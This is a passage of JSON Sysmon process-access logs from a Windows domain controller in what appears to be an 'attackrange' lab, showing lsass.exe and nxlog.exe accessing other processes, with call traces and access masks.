C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:50.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:50.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:50.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010546B0100}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:51.312\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:51.312","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:52.314\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:52.314","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:53.316\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:53.316","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:54.319\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:54.319","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:55.321\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:55.321","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
